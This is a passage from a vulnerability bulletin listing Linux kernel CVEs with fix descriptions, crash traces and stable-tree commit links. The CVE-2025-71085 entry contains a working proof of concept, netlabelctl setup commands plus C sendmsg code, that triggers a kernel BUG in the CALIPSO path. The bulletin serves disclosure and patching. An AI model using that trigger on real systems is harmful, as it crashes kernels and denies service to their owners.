slb_setup_new_exec() sched_switch event sched_migrate_task migrates process P to cpu-0 context_switch from swapper/0 to Process P switch_mm_irqs_off() /* * Since both prev and next mm struct are same we don't call * switch_mmu_context(). This will cause the HW SLB and SW preload * cache to go out of sync in preload_new_slb_context. Because there * was an SLB entry which was evicted from both HW and preload cache * on cpu-1. Now later in preload_new_slb_context(), when we will try * to add the same preload entry again, we will add this to the SW * preload cache and then will add it to the HW SLB. Since on cpu-0 * this entry was never invalidated, hence adding this entry to the HW * SLB will cause a SLB multi-hit error. */ load_elf_binary cont ---truncated--- | 2026-01-13 | not yet calculated | CVE-2025-71078 | https://git.kernel.org/stable/c/01324c0328181b94cf390bda22ff91c75126ea57 https://git.kernel.org/stable/c/2e9a95d60f1df7b57618fd5ef057aef331575bd2 https://git.kernel.org/stable/c/c9f865022a1823d814032a09906e91e4701a35fc https://git.kernel.org/stable/c/b13a3dbfa196af68eae2031f209743735ad416bf https://git.kernel.org/stable/c/895123c309a34d2cfccf7812b41e17261a3a6f37 https://git.kernel.org/stable/c/4ae1e46d8a290319f33f71a2710a1382ba5431e8 https://git.kernel.org/stable/c/00312419f0863964625d6dcda8183f96849412c6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: nfc: fix deadlock between nfc_unregister_device and rfkill_fop_write A deadlock can occur between nfc_unregister_device() and rfkill_fop_write() due to lock ordering inversion between device_lock and rfkill_global_mutex. The problematic lock order is: Thread A (rfkill_fop_write): rfkill_fop_write() mutex_lock(&rfkill_global_mutex) rfkill_set_block() nfc_rfkill_set_block() nfc_dev_down() device_lock(&dev->dev) <- waits for device_lock Thread B (nfc_unregister_device): nfc_unregister_device() device_lock(&dev->dev) rfkill_unregister() mutex_lock(&rfkill_global_mutex) <- waits for rfkill_global_mutex This creates a classic ABBA deadlock scenario. Fix this by moving rfkill_unregister() and rfkill_destroy() outside the device_lock critical section. Store the rfkill pointer in a local variable before releasing the lock, then call rfkill_unregister() after releasing device_lock. This change is safe because rfkill_fop_write() holds rfkill_global_mutex while calling the rfkill callbacks, and rfkill_unregister() also acquires rfkill_global_mutex before cleanup. Therefore, rfkill_unregister() will wait for any ongoing callback to complete before proceeding, and device_del() is only called after rfkill_unregister() returns, preventing any use-after-free. The similar lock ordering in nfc_register_device() (device_lock -> rfkill_global_mutex via rfkill_register) is safe because during registration the device is not yet in rfkill_list, so no concurrent rfkill operations can occur on this device. | 2026-01-13 | not yet calculated | CVE-2025-71079 | https://git.kernel.org/stable/c/2e0831e9fc46a06daa6d4d8d57a2738e343130c3 https://git.kernel.org/stable/c/e02a1c33f10a0ed3aba855ab8ae2b6c4c5be8012 https://git.kernel.org/stable/c/ee41f4f3ccf8cd6ba3732e867abbec7e6d8d12e5 https://git.kernel.org/stable/c/6b93c8ab6f6cda8818983a4ae3fcf84b023037b4 https://git.kernel.org/stable/c/8fc4632fb508432895430cd02b38086bdd649083 https://git.kernel.org/stable/c/f3a8a7c1aa278f2378b2f3a10500c6674dffdfda https://git.kernel.org/stable/c/1ab526d97a57e44d26fadcc0e9adeb9c0c0182f5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv6: fix a BUG in rt6_get_pcpu_route() under PREEMPT_RT On PREEMPT_RT kernels, after rt6_get_pcpu_route() returns NULL, the current task can be preempted. Another task running on the same CPU may then execute rt6_make_pcpu_route() and successfully install a pcpu_rt entry. When the first task resumes execution, its cmpxchg() in rt6_make_pcpu_route() will fail because rt6i_pcpu is no longer NULL, triggering the BUG_ON(prev). It's easy to reproduce it by adding mdelay() after rt6_get_pcpu_route(). Using preempt_disable/enable is not appropriate here because ip6_rt_pcpu_alloc() may sleep. Fix this by handling the cmpxchg() failure gracefully on PREEMPT_RT: free our allocation and return the existing pcpu_rt installed by another task. The BUG_ON is replaced by WARN_ON_ONCE for non-PREEMPT_RT kernels where such races should not occur. | 2026-01-13 | not yet calculated | CVE-2025-71080 | https://git.kernel.org/stable/c/1dc33ad0867325f8d2c6d7b2a6f542d4f3121f66 https://git.kernel.org/stable/c/787515ccb2292f82eb0876993129154629a49651 https://git.kernel.org/stable/c/1adaea51c61b52e24e7ab38f7d3eba023b2d050d |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ASoC: stm32: sai: fix OF node leak on probe The reference taken to the sync provider OF node when probing the platform device is currently only dropped if the set_sync() callback fails during DAI probe. Make sure to drop the reference on platform probe failures (e.g. probe deferral) and on driver unbind. This also avoids a potential use-after-free in case the DAI is ever reprobed without first rebinding the platform driver. | 2026-01-13 | not yet calculated | CVE-2025-71081 | https://git.kernel.org/stable/c/7daa50a2157e41c964b745ab1dc378b5b3b626d1 https://git.kernel.org/stable/c/acda653169e180b1d860dbb6bc5aceb105858394 https://git.kernel.org/stable/c/4054a3597d047f3fe87864ef87f399b5d523e6c0 https://git.kernel.org/stable/c/bae74771fc5d3b2a9cf6f5aa64596083d032c4a3 https://git.kernel.org/stable/c/3752afcc6d80d5525e236e329895ba2cb93bcb26 https://git.kernel.org/stable/c/23261f0de09427367e99f39f588e31e2856a690e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: btusb: revert use of devm_kzalloc in btusb This reverts commit 98921dbd00c4e ("Bluetooth: Use devm_kzalloc in btusb.c file"). In btusb_probe(), we use devm_kzalloc() to allocate the btusb data. This ties the lifetime of all the btusb data to the binding of a driver to one interface, INTF. In a driver that binds to other interfaces, ISOC and DIAG, this is an accident waiting to happen. The issue is revealed in btusb_disconnect(), where calling usb_driver_release_interface(&btusb_driver, data->intf) will have devm free the data that is also being used by the other interfaces of the driver that may not be released yet. To fix this, revert the use of devm and go back to freeing memory explicitly. | 2026-01-13 | not yet calculated | CVE-2025-71082 | https://git.kernel.org/stable/c/fff9206b0907252a41eb12b7c1407b9347df18b1 https://git.kernel.org/stable/c/cca0e9206e3bcc63cd3e72193e60149165d493cc https://git.kernel.org/stable/c/c0ecb3e4451fe94f4315e6d09c4046dfbc42090b https://git.kernel.org/stable/c/1e54c19eaf84ba652c4e376571093e58e144b339 https://git.kernel.org/stable/c/fdf7c640fb8a44a59b0671143d8c2f738bc48003 https://git.kernel.org/stable/c/252714f1e8bdd542025b16321c790458014d6880 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/ttm: Avoid NULL pointer deref for evicted BOs It is possible for a BO to exist that is not currently associated with a resource, e.g. because it has been evicted. When devcoredump tries to read the contents of all BOs for dumping, we need to expect this as well -- in this case, ENODATA is recorded instead of the buffer contents. | 2026-01-13 | not yet calculated | CVE-2025-71083 | https://git.kernel.org/stable/c/47a85604a761005d255ae38115ee630cc6931756 https://git.kernel.org/stable/c/4b9944493c6d92d7b29cfd83aaf3deb842b8da79 https://git.kernel.org/stable/c/3d004f7341d4898889801ebb2ef61ffca610dd6f https://git.kernel.org/stable/c/5a81095d3e1b521ac7cfe3b14d5f149bace3d6e0 https://git.kernel.org/stable/c/b94182b3d7228aec18d069cba56d5982e9bfe1b1 https://git.kernel.org/stable/c/491adc6a0f9903c32b05f284df1148de39e8e644 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/cm: Fix leaking the multicast GID table reference If the CM ID is destroyed while the CM event for multicast creating is still queued the cancel_work_sync() will prevent the work from running which also prevents destroying the ah_attr. This leaks a refcount and triggers a WARN: GID entry ref leak for dev syz1 index 2 ref=573 WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 release_gid_table drivers/infiniband/core/cache.c:806 [inline] WARNING: CPU: 1 PID: 655 at drivers/infiniband/core/cache.c:809 gid_table_release_one+0x284/0x3cc drivers/infiniband/core/cache.c:886 Destroy the ah_attr after canceling the work, it is safe to call this twice. | 2026-01-13 | not yet calculated | CVE-2025-71084 | https://git.kernel.org/stable/c/d5ce588a9552878859a4d44b70b724216c188a5f https://git.kernel.org/stable/c/abf38398724ecc888f62c678d288da40d11878af https://git.kernel.org/stable/c/ab668a58c4a2ccb6d54add7a76f2f955d15d0196 https://git.kernel.org/stable/c/c0acdee513239e1d6e1b490f56be0e6837dfd162 https://git.kernel.org/stable/c/5cb34bb5fd726491b809efbeb5cfd63ae5bf9cf3 https://git.kernel.org/stable/c/3ba6d01c4b3c584264dc733c6a2ecc5bbc8e0bb5 https://git.kernel.org/stable/c/57f3cb6c84159d12ba343574df2115fb18dd83ca |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() There exists a kernel oops caused by a BUG_ON(nhead < 0) at net/core/skbuff.c:2232 in pskb_expand_head(). This bug is triggered as part of the calipso_skbuff_setattr() routine when skb_cow() is passed headroom > INT_MAX (i.e. (int)(skb_headroom(skb) + len_delta) < 0). The root cause of the bug is due to an implicit integer cast in __skb_cow(). The check (headroom > skb_headroom(skb)) is meant to ensure that delta = headroom - skb_headroom(skb) is never negative, otherwise we will trigger a BUG_ON in pskb_expand_head(). However, if headroom > INT_MAX and delta <= -NET_SKB_PAD, the check passes, delta becomes negative, and pskb_expand_head() is passed a negative value for nhead. Fix the trigger condition in calipso_skbuff_setattr(). Avoid passing "negative" headroom sizes to skb_cow() within calipso_skbuff_setattr() by only using skb_cow() to grow headroom. PoC: Using `netlabelctl` tool: netlabelctl map del default netlabelctl calipso add pass doi:7 netlabelctl map add default address:0::1/128 protocol:calipso,7 Then run the following PoC: int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP); // setup msghdr int cmsg_size = 2; int cmsg_len = 0x60; struct msghdr msg; struct sockaddr_in6 dest_addr; struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1, sizeof(struct cmsghdr) + cmsg_len); msg.msg_name = &dest_addr; msg.msg_namelen = sizeof(dest_addr); msg.msg_iov = NULL; msg.msg_iovlen = 0; msg.msg_control = cmsg; msg.msg_controllen = cmsg_len; msg.msg_flags = 0; // setup sockaddr dest_addr.sin6_family = AF_INET6; dest_addr.sin6_port = htons(31337); dest_addr.sin6_flowinfo = htonl(31337); dest_addr.sin6_addr = in6addr_loopback; dest_addr.sin6_scope_id = 31337; // setup cmsghdr cmsg->cmsg_len = cmsg_len; cmsg->cmsg_level = IPPROTO_IPV6; cmsg->cmsg_type = IPV6_HOPOPTS; char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr); hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80 sendmsg(fd, &msg, 0); | 2026-01-13 | not yet calculated | CVE-2025-71085 | https://git.kernel.org/stable/c/86f365897068d09418488165a68b23cb5baa37f2 https://git.kernel.org/stable/c/6b7522424529556c9cbc15e15e7bd4eeae310910 https://git.kernel.org/stable/c/2bb759062efa188ea5d07242a43e5aa5464bbae1 https://git.kernel.org/stable/c/c53aa6a5086f03f19564096ee084a202a8c738c0 https://git.kernel.org/stable/c/bf3709738d8a8cc6fa275773170c5c29511a0b24 https://git.kernel.org/stable/c/73744ad5696dce0e0f43872aba8de6a83d6ad570 https://git.kernel.org/stable/c/58fc7342b529803d3c221101102fe913df7adb83 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: rose: fix invalid array index in rose_kill_by_device() rose_kill_by_device() collects sockets into a local array[] and then iterates over them to disconnect sockets bound to a device being brought down. The loop mistakenly indexes array[cnt] instead of array[i]. For cnt < ARRAY_SIZE(array), this reads an uninitialized entry; for cnt == ARRAY_SIZE(array), it is an out-of-bounds read. Either case can lead to an invalid socket pointer dereference and also leaks references taken via sock_hold(). Fix the index to use i. | 2026-01-13 | not yet calculated | CVE-2025-71086 | https://git.kernel.org/stable/c/819fb41ae54960f66025802400c9d3935eef4042 https://git.kernel.org/stable/c/ed2639414d43ba037f798eaf619e878309310451 https://git.kernel.org/stable/c/1418c12cd3bba79dc56b57b61c99efe40f579981 https://git.kernel.org/stable/c/9f6185a32496834d6980b168cffcccc2d6b17280 https://git.kernel.org/stable/c/b409ba9e1e63ccf3ab4cc061e33c1f804183543e https://git.kernel.org/stable/c/92d900aac3a5721fb54f3328f1e089b44a861c38 https://git.kernel.org/stable/c/6595beb40fb0ec47223d3f6058ee40354694c8e4 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iavf: fix off-by-one issues in iavf_config_rss_reg() There are off-by-one bugs when configuring RSS hash key and lookup table, causing out-of-bounds reads to memory [1] and out-of-bounds writes to device registers. Before commit 43a3d9ba34c9 ("i40evf: Allow PF driver to configure RSS"), the loop upper bounds were: i <= I40E_VFQF_{HKEY,HLUT}_MAX_INDEX which is safe since the value is the last valid index. That commit changed the bounds to: i <= adapter->rss_{key,lut}_size / 4 where `rss_{key,lut}_size / 4` is the number of dwords, so the last valid index is `(rss_{key,lut}_size / 4) - 1`. Therefore, using `<=` accesses one element past the end. Fix the issues by using `<` instead of `<=`, ensuring we do not exceed the bounds. [1] KASAN splat about rss_key_size off-by-one BUG: KASAN: slab-out-of-bounds in iavf_config_rss+0x619/0x800 Read of size 4 at addr ffff888102c50134 by task kworker/u8:6/63 CPU: 0 UID: 0 PID: 63 Comm: kworker/u8:6 Not tainted 6.18.0-rc2-enjuk-tnguy-00378-g3005f5b77652-dirty #156 PREEMPT(voluntary) Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2 04/01/2014 Workqueue: iavf iavf_watchdog_task Call Trace: <TASK> dump_stack_lvl+0x6f/0xb0 print_report+0x170/0x4f3 kasan_report+0xe1/0x1a0 iavf_config_rss+0x619/0x800 iavf_watchdog_task+0x2be7/0x3230 process_one_work+0x7fd/0x1420 worker_thread+0x4d1/0xd40 kthread+0x344/0x660 ret_from_fork+0x249/0x320 ret_from_fork_asm+0x1a/0x30 </TASK> Allocated by task 63: kasan_save_stack+0x30/0x50 kasan_save_track+0x14/0x30 __kasan_kmalloc+0x7f/0x90 __kmalloc_noprof+0x246/0x6f0 iavf_watchdog_task+0x28fc/0x3230 process_one_work+0x7fd/0x1420 worker_thread+0x4d1/0xd40 kthread+0x344/0x660 ret_from_fork+0x249/0x320 ret_from_fork_asm+0x1a/0x30 The buggy address belongs to the object at ffff888102c50100 which belongs to the cache kmalloc-64 of size 64 The buggy address is located 0 bytes to the right of allocated 52-byte region [ffff888102c50100, ffff888102c50134) The buggy address belongs to the physical page: page: refcount:0 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x102c50 flags: 0x200000000000000(node=0|zone=2) page_type: f5(slab) raw: 0200000000000000 ffff8881000418c0 dead000000000122 0000000000000000 raw: 0000000000000000 0000000080200020 00000000f5000000 0000000000000000 page dumped because: kasan: bad access detected Memory state around the buggy address: ffff888102c50000: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc ffff888102c50080: 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc fc >ffff888102c50100: 00 00 00 00 00 00 04 fc fc fc fc fc fc fc fc fc ^ ffff888102c50180: 00 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc ffff888102c50200: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc | 2026-01-13 | not yet calculated | CVE-2025-71087 | https://git.kernel.org/stable/c/ceb8459df28d22c225a82d74c0f725f2a935d194 https://git.kernel.org/stable/c/5bb18bfd505ca1affbca921462c350095a6c798c https://git.kernel.org/stable/c/d7369dc8dd7cbf5cee3a22610028d847b6f02982 https://git.kernel.org/stable/c/18de0e41d69d97fab10b91fecf10ae78a5e43232 https://git.kernel.org/stable/c/f36de3045d006e6d9be1be495f2ed88d1721e752 https://git.kernel.org/stable/c/3095228e1320371e143835d0cebeef1a8a754c66 https://git.kernel.org/stable/c/6daa2893f323981c7894c68440823326e93a7d61 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: fallback earlier on simult connection Syzkaller reports a simult-connect race leading to inconsistent fallback status: WARNING: CPU: 3 PID: 33 at net/mptcp/subflow.c:1515 subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515 Modules linked in: CPU: 3 UID: 0 PID: 33 Comm: ksoftirqd/3 Not tainted syzkaller #0 PREEMPT(full) Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014 RIP: 0010:subflow_data_ready+0x40b/0x7c0 net/mptcp/subflow.c:1515 Code: 89 ee e8 78 61 3c f6 40 84 ed 75 21 e8 8e 66 3c f6 44 89 fe bf 07 00 00 00 e8 c1 61 3c f6 41 83 ff 07 74 09 e8 76 66 3c f6 90 <0f> 0b 90 e8 6d 66 3c f6 48 89 df e8 e5 ad ff ff 31 ff 89 c5 89 c6 RSP: 0018:ffffc900006cf338 EFLAGS: 00010246 RAX: 0000000000000000 RBX: ffff888031acd100 RCX: ffffffff8b7f2abf RDX: ffff88801e6ea440 RSI: ffffffff8b7f2aca RDI: 0000000000000005 RBP: 0000000000000000 R08: 0000000000000005 R09: 0000000000000007 R10: 0000000000000004 R11: 0000000000002c10 R12: ffff88802ba69900 R13: 1ffff920000d9e67 R14: ffff888046f81800 R15: 0000000000000004 FS: 0000000000000000(0000) GS:ffff8880d69bc000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 0000560fc0ca1670 CR3: 0000000032c3a000 CR4: 0000000000352ef0 Call Trace: <TASK> tcp_data_queue+0x13b0/0x4f90 net/ipv4/tcp_input.c:5197 tcp_rcv_state_process+0xfdf/0x4ec0 net/ipv4/tcp_input.c:6922 tcp_v6_do_rcv+0x492/0x1740 net/ipv6/tcp_ipv6.c:1672 tcp_v6_rcv+0x2976/0x41e0 net/ipv6/tcp_ipv6.c:1918 ip6_protocol_deliver_rcu+0x188/0x1520 net/ipv6/ip6_input.c:438 ip6_input_finish+0x1e4/0x4b0 net/ipv6/ip6_input.c:489 NF_HOOK include/linux/netfilter.h:318 [inline] NF_HOOK include/linux/netfilter.h:312 [inline] ip6_input+0x105/0x2f0 net/ipv6/ip6_input.c:500 dst_input include/net/dst.h:471 [inline] ip6_rcv_finish net/ipv6/ip6_input.c:79 [inline] NF_HOOK include/linux/netfilter.h:318 [inline] NF_HOOK include/linux/netfilter.h:312 [inline] ipv6_rcv+0x264/0x650 net/ipv6/ip6_input.c:311 __netif_receive_skb_one_core+0x12d/0x1e0 net/core/dev.c:5979 __netif_receive_skb+0x1d/0x160 net/core/dev.c:6092 process_backlog+0x442/0x15e0 net/core/dev.c:6444 __napi_poll.constprop.0+0xba/0x550 net/core/dev.c:7494 napi_poll net/core/dev.c:7557 [inline] net_rx_action+0xa9f/0xfe0 net/core/dev.c:7684 handle_softirqs+0x216/0x8e0 kernel/softirq.c:579 run_ksoftirqd kernel/softirq.c:968 [inline] run_ksoftirqd+0x3a/0x60 kernel/softirq.c:960 smpboot_thread_fn+0x3f7/0xae0 kernel/smpboot.c:160 kthread+0x3c2/0x780 kernel/kthread.c:463 ret_from_fork+0x5d7/0x6f0 arch/x86/kernel/process.c:148 ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:245 </TASK> The TCP subflow can process the simult-connect syn-ack packet after transitioning to TCP_FIN1 state, bypassing the MPTCP fallback check, as the sk_state_change() callback is not invoked for * -> FIN_WAIT1 transitions. That will move the msk socket to an inconsistent status and the next incoming data will hit the reported splat. Close the race moving the simult-fallback check at the earliest possible stage - that is at syn-ack generation time. About the fixes tags: [2] was supposed to also fix this issue introduced by [3]. [1] is required as a dependence: it was not explicitly marked as a fix, but it is one and it has already been backported before [3]. In other words, this commit should be backported up to [3], including [2] and [1] if that's not already there. | 2026-01-13 | not yet calculated | CVE-2025-71088 | https://git.kernel.org/stable/c/b5f46a08269265e2f5e87d855287d6d22de0a32b https://git.kernel.org/stable/c/c9bf315228287653522894df9d851e9b43db9516 https://git.kernel.org/stable/c/79f80a7a47849ef1b3c25a0bedcc448b9cb551c1 https://git.kernel.org/stable/c/25f1ae942c097b7ae4ce5c2b9c6fefb8e3672b86 https://git.kernel.org/stable/c/71154bbe49423128c1c8577b6576de1ed6836830 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iommu: disable SVA when CONFIG_X86 is set Patch series "Fix stale IOTLB entries for kernel address space", v7. This proposes a fix for a security vulnerability related to IOMMU Shared Virtual Addressing (SVA). In an SVA context, an IOMMU can cache kernel page table entries. When a kernel page table page is freed and reallocated for another purpose, the IOMMU might still hold stale, incorrect entries. This can be exploited to cause a use-after-free or write-after-free condition, potentially leading to privilege escalation or data corruption. This solution introduces a deferred freeing mechanism for kernel page table pages, which provides a safe window to notify the IOMMU to invalidate its caches before the page is reused. This patch (of 8): In the IOMMU Shared Virtual Addressing (SVA) context, the IOMMU hardware shares and walks the CPU's page tables. The x86 architecture maps the kernel's virtual address space into the upper portion of every process's page table. Consequently, in an SVA context, the IOMMU hardware can walk and cache kernel page table entries. The Linux kernel currently lacks a notification mechanism for kernel page table changes, specifically when page table pages are freed and reused. The IOMMU driver is only notified of changes to user virtual address mappings. This can cause the IOMMU's internal caches to retain stale entries for kernel VA. Use-After-Free (UAF) and Write-After-Free (WAF) conditions arise when kernel page table pages are freed and later reallocated. The IOMMU could misinterpret the new data as valid page table entries. The IOMMU might then walk into attacker-controlled memory, leading to arbitrary physical memory DMA access or privilege escalation. This is also a Write-After-Free issue, as the IOMMU will potentially continue to write Accessed and Dirty bits to the freed memory while attempting to walk the stale page tables. Currently, SVA contexts are unprivileged and cannot access kernel mappings. However, the IOMMU will still walk kernel-only page tables all the way down to the leaf entries, where it realizes the mapping is for the kernel and errors out. This means the IOMMU still caches these intermediate page table entries, making the described vulnerability a real concern. Disable SVA on x86 architecture until the IOMMU can receive notification to flush the paging cache before freeing the CPU kernel page table pages. | 2026-01-13 | not yet calculated | CVE-2025-71089 | https://git.kernel.org/stable/c/240cd7f2812cc25496b12063d11c823618f364e9 https://git.kernel.org/stable/c/c2c3f1a3fd74ef16cf115f0c558616a13a8471b4 https://git.kernel.org/stable/c/c341dee80b5df49a936182341b36395c831c2661 https://git.kernel.org/stable/c/72f98ef9a4be30d2a60136dd6faee376f780d06c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nfsd: fix nfsd_file reference leak in nfsd4_add_rdaccess_to_wrdeleg() nfsd4_add_rdaccess_to_wrdeleg() unconditionally overwrites fp->fi_fds[O_RDONLY] with a newly acquired nfsd_file. However, if the client already has a SHARE_ACCESS_READ open from a previous OPEN operation, this action overwrites the existing pointer without releasing its reference, orphaning the previous reference. Additionally, the function originally stored the same nfsd_file pointer in both fp->fi_fds[O_RDONLY] and fp->fi_rdeleg_file with only a single reference. When put_deleg_file() runs, it clears fi_rdeleg_file and calls nfs4_file_put_access() to release the file. However, nfs4_file_put_access() only releases fi_fds[O_RDONLY] when the fi_access[O_RDONLY] counter drops to zero. If another READ open exists on the file, the counter remains elevated and the nfsd_file reference from the delegation is never released. This potentially causes open conflicts on that file. Then, on server shutdown, these leaks cause __nfsd_file_cache_purge() to encounter files with an elevated reference count that cannot be cleaned up, ultimately triggering a BUG() in kmem_cache_destroy() because there are still nfsd_file objects allocated in that cache. | 2026-01-13 | not yet calculated | CVE-2025-71090 | https://git.kernel.org/stable/c/c07dc84ed67c5a182273171639bacbbb87c12175 https://git.kernel.org/stable/c/8072e34e1387d03102b788677d491e2bcceef6f5 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: team: fix check for port enabled in team_queue_override_port_prio_changed() There has been a syzkaller bug reported recently with the following trace: list_del corruption, ffff888058bea080->prev is LIST_POISON2 (dead000000000122) ------------[ cut here ]------------ kernel BUG at lib/list_debug.c:59! Oops: invalid opcode: 0000 [#1] SMP KASAN NOPTI CPU: 3 UID: 0 PID: 21246 Comm: syz.0.2928 Not tainted syzkaller #0 PREEMPT(full) Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.16.3-debian-1.16.3-2~bpo12+1 04/01/2014 RIP: 0010:__list_del_entry_valid_or_report+0x13e/0x200 lib/list_debug.c:59 Code: 48 c7 c7 e0 71 f0 8b e8 30 08 ef fc 90 0f 0b 48 89 ef e8 a5 02 55 fd 48 89 ea 48 89 de 48 c7 c7 40 72 f0 8b e8 13 08 ef fc 90 <0f> 0b 48 89 ef e8 88 02 55 fd 48 89 ea 48 b8 00 00 00 00 00 fc ff RSP: 0018:ffffc9000d49f370 EFLAGS: 00010286 RAX: 000000000000004e RBX: ffff888058bea080 RCX: ffffc9002817d000 RDX: 0000000000000000 RSI: ffffffff819becc6 RDI: 0000000000000005 RBP: dead000000000122 R08: 0000000000000005 R09: 0000000000000000 R10: 0000000080000000 R11: 0000000000000001 R12: ffff888039e9c230 R13: ffff888058bea088 R14: ffff888058bea080 R15: ffff888055461480 FS: 00007fbbcfe6f6c0(0000) GS:ffff8880d6d0a000(0000) knlGS:0000000000000000 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 000000110c3afcb0 CR3: 00000000382c7000 CR4: 0000000000352ef0 Call Trace: <TASK> __list_del_entry_valid include/linux/list.h:132 [inline] __list_del_entry include/linux/list.h:223 [inline] list_del_rcu include/linux/rculist.h:178 [inline] __team_queue_override_port_del drivers/net/team/team_core.c:826 [inline] __team_queue_override_port_del drivers/net/team/team_core.c:821 [inline] team_queue_override_port_prio_changed drivers/net/team/team_core.c:883 [inline] team_priority_option_set+0x171/0x2f0 drivers/net/team/team_core.c:1534 team_option_set drivers/net/team/team_core.c:376 [inline] team_nl_options_set_doit+0x8ae/0xe60 drivers/net/team/team_core.c:2653 genl_family_rcv_msg_doit+0x209/0x2f0 net/netlink/genetlink.c:1115 genl_family_rcv_msg net/netlink/genetlink.c:1195 [inline] genl_rcv_msg+0x55c/0x800 net/netlink/genetlink.c:1210 netlink_rcv_skb+0x158/0x420 net/netlink/af_netlink.c:2552 genl_rcv+0x28/0x40 net/netlink/genetlink.c:1219 netlink_unicast_kernel net/netlink/af_netlink.c:1320 [inline] netlink_unicast+0x5aa/0x870 net/netlink/af_netlink.c:1346 netlink_sendmsg+0x8c8/0xdd0 net/netlink/af_netlink.c:1896 sock_sendmsg_nosec net/socket.c:727 [inline] __sock_sendmsg net/socket.c:742 [inline] ____sys_sendmsg+0xa98/0xc70 net/socket.c:2630 ___sys_sendmsg+0x134/0x1d0 net/socket.c:2684 __sys_sendmsg+0x16d/0x220 net/socket.c:2716 do_syscall_x64 arch/x86/entry/syscall_64.c:63 [inline] do_syscall_64+0xcd/0xfa0 arch/x86/entry/syscall_64.c:94 entry_SYSCALL_64_after_hwframe+0x77/0x7f The problem is in this flow: 1) Port is enabled, queue_id != 0, in qom_list 2) Port gets disabled -> team_port_disable() -> team_queue_override_port_del() -> del (removed from list) 3) Port is disabled, queue_id != 0, not in any list 4) Priority changes -> team_queue_override_port_prio_changed() -> checks: port disabled && queue_id != 0 -> calls del - hits the BUG as it is removed already To fix this, change the check in team_queue_override_port_prio_changed() so it returns early if port is not enabled. | 2026-01-13 | not yet calculated | CVE-2025-71091 | https://git.kernel.org/stable/c/25029e813c4aae5fcf7118e8dd5c56e382b9a1a3 https://git.kernel.org/stable/c/f820e438b8ec2a8354e70e75145f05fe45500d97 https://git.kernel.org/stable/c/53a727a8bfd78c739e130a781192d0f6f8e03d39 https://git.kernel.org/stable/c/6bfb62b6010a16112dcae52f490e5e0e6abe12a3 https://git.kernel.org/stable/c/107d245f84cb4f55f597d31eda34b42a2b7d6952 https://git.kernel.org/stable/c/b71187648ef2349254673d0523fdf96d1fe3d758 https://git.kernel.org/stable/c/932ac51d9953eaf77a1252f79b656d4ca86163c6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/bnxt_re: Fix OOB write in bnxt_re_copy_err_stats() Commit ef56081d1864 ("RDMA/bnxt_re: RoCE related hardware counters update") added three new counters and placed them after BNXT_RE_OUT_OF_SEQ_ERR. BNXT_RE_OUT_OF_SEQ_ERR acts as a boundary marker for allocating hardware statistics with different num_counters values on chip_gen_p5_p7 devices. As a result, BNXT_RE_NUM_STD_COUNTERS are used when allocating hw_stats, which leads to an out-of-bounds write in bnxt_re_copy_err_stats(). The counters BNXT_RE_REQ_CQE_ERROR, BNXT_RE_RESP_CQE_ERROR, and BNXT_RE_RESP_REMOTE_ACCESS_ERRS are applicable to generic hardware, not only p5/p7 devices. Fix this by moving these counters before BNXT_RE_OUT_OF_SEQ_ERR so they are included in the generic counter set. | 2026-01-13 | not yet calculated | CVE-2025-71092 | https://git.kernel.org/stable/c/369a161c48723f60f06f3510b82ea7d96d0499ab https://git.kernel.org/stable/c/9b68a1cc966bc947d00e4c0df7722d118125aa37 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: e1000: fix OOB in e1000_tbi_should_accept() In e1000_tbi_should_accept() we read the last byte of the frame via 'data[length - 1]' to evaluate the TBI workaround. If the descriptor-reported length is zero or larger than the actual RX buffer size, this read goes out of bounds and can hit unrelated slab objects. The issue is observed from the NAPI receive path (e1000_clean_rx_irq): ================================================================== BUG: KASAN: slab-out-of-bounds in e1000_tbi_should_accept+0x610/0x790 Read of size 1 at addr ffff888014114e54 by task sshd/363 CPU: 0 PID: 363 Comm: sshd Not tainted 5.18.0-rc1 #1 Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.12.0-59-gc9ba5276e321-prebuilt.qemu.org 04/01/2014 Call Trace: <IRQ> dump_stack_lvl+0x5a/0x74 print_address_description+0x7b/0x440 print_report+0x101/0x200 kasan_report+0xc1/0xf0 e1000_tbi_should_accept+0x610/0x790 e1000_clean_rx_irq+0xa8c/0x1110 e1000_clean+0xde2/0x3c10 __napi_poll+0x98/0x380 net_rx_action+0x491/0xa20 __do_softirq+0x2c9/0x61d do_softirq+0xd1/0x120 </IRQ> <TASK> __local_bh_enable_ip+0xfe/0x130 